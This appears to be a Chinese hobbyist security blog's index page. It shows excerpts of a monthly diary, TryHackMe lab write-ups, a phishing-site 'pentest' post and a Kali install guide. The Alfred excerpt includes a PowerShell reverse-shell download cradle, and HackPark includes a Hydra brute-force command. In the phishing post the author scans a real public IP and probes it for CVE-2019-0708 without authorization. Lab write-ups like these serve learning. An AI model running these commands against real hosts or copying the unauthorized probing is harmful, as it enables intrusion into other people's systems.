23.6杂谈
博客建立以来第一篇杂谈,打算每个月都写一点东西,总结记录下这个月的一些7788的东西。真的算得上是忙碌的一个月,虽然前后反差还挺大的。从准确来说是从上个月底的黑盾杯和国赛开始一直到前不久刚结束的各种考试,真的算是一直绷着神经硬撑到考试结束233,算是大学以来最忙碌的一段时间吧。每年的六月都算是最喜欢的时期吧,去年是考完高考的放松吧,不知不觉成为带学生已经一年了捏,而且也到了最喜欢的暑期。然后还有“日记周年”的时间,感觉是每一年中最年轻的一个月吧(笑)。考完试还是比较放松的吧,放松但不代表清闲,反而有很多事情想要做,但不是很多事情要被做。憋了一个月的THM瘾犯了,动力满满地疯狂学习+打靶机,还是挺开心的捏。但是放假后的时间几乎除了晚上回宿舍睡觉都呆在图书馆吧,前几天倒是和朋友久违的出去玩了一整天,很放松很开心的感觉,主要想做的事情实在是太多了。搭了一直想搭的博客,然后多多少少都会记录下发布一些文章,留给后人或者同好看233,主要还是想记录下人生什么的。这个月好像前几个都开始看的大江健三郎的《万延元年的FOOTBALL》是这个月一直在看的,真的是难读的一本书啊,也许是自己越来越浮躁而读 ...
打靶记录(二)之THMhackpark
端口扫描sudo nmap –min-rate 10000 -p- 10.10.116.243 -Pn
扫描全部端口,设置最小速度为10000
sudo nmap -sT -sV -O -p80,3389 10.10.116.243 -Pn
对指定的端口用TCP协议扫描,扫描版本号和操作系统
Web登录网站
要求得到小丑的名字,直接百度识图,是一部电影,主角叫Pennywise
爆破密码根据THM提示,在登录界面用Hydra爆破密码,账户名猜测为admin
在这之前用bp抓个包,随便输入1 1
将__VIEWSTATE到”Login+in”作为表单数据,Login failed为报错信息(在输入错误的用户名密码搭配时的提示错误信息)
表单路径为/Account/login.aspx
于是最终命令为(字典随便选了一个):
sudo hydra -l admin -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt 10.10.116.243 http-post-form "/Accoun ...
打靶记录(一)之THMAlfred
Initial Accessnmap扫描端口
浏览器访问8080端口的web服务,发现是一个Jenkins CMS
尝试admin admin 成功登录
也可以用hydra爆破,这里贴一张网上的WP图
稍微在网上搜索下这个比较经典的CMS,就可以知道这有个页面可以上我们RCE
https://github.com/samratashok/nishang
利用这其中的Invoke-PowerShellTcp.ps1来进行反向shell
在本地开启Python服务来让靶机下载我们的shell,开启nc来监听反向shell
在靶机上,用powershell脚本来进行反向shell的下载与连接,IP为自己攻击机的IP,
powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.17.49.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.49.170 -Port 1234
apply,s ...
记一次对钓鱼网站的简单渗透测试
碎碎念也算小学了几个月的渗透,没想到碰上了钓鱼邮件,这不得练练实战,狠狠得惩罚他(
信息搜集进入网站之后,发现是个QQ邮箱界面,当然看网址就一眼假
先通过ping得到他的真实IP,
https://ping.chinaz.com
是38.55.193.233准没错了
拿nmap狠狠地扫他
发现开启了80和3389两个端口,80端口比较平常,试着搜一下ms-wbt-server这个服务,发现了这个文章,竟然有CVE,是windows平台的
https://blog.csdn.net/s619782146/article/details/125540370
通过这个插件可以知道,主机的操作系统也确实是windows,这下可精神了。
开搞尝试搜索CVE-2019-0708,是一个RCE漏洞
打开我们的msf
search 0708
先扫描是否真的存在漏铜,所以 use 0
show options,要设置目标的主机
于是:set RHOSTS 38.55.193.233
run
发现存在漏洞!
下载POC
https://github.com/n1xbyte/CVE-2019 ...
Vmware安装kali linux
跟着CSDN某不良文章操作后kali崩了(恼,又没保存快照。要养成经常保存快照的习惯。在重装的过程中随手水下第一篇博客。
镜像下载下载kali linux镜像,我这里选择23年2月的最新版
https://www.kali.org/
创建虚拟机
选择Debian 8.x 64(kali基于Debian)
选择虚拟机创建路径,建议放在空间较大的地方
这里根据自己宿主机的内核总数来选,理论上只要小于宿主机内核总数就好,我这里选2+2。
打开任务管理器,打开“性能”。我的是16个逻辑处理器,所以理论上小于16就好(这块还不太懂)
内存根据自己宿主机来选,推荐4G以上,我记得John爆破需要至少4G的内存
选择存储为单个文件,选择磁盘大小,我这里选择100G。建议选大些,可以省去以后扩容磁盘的麻烦(不过学一下还是有必要的)。之前选20G实在是不够用,后面又扩容了。
像打印机这种没什么用的可以移除,然后新CD/DVD,选择下好的kali镜像文件
发现虚拟机已经创建好了,虚拟机的名称可以自己重命名。开启虚拟机。
安装
选择第一个图形化安装,回车
语言自行选 ...
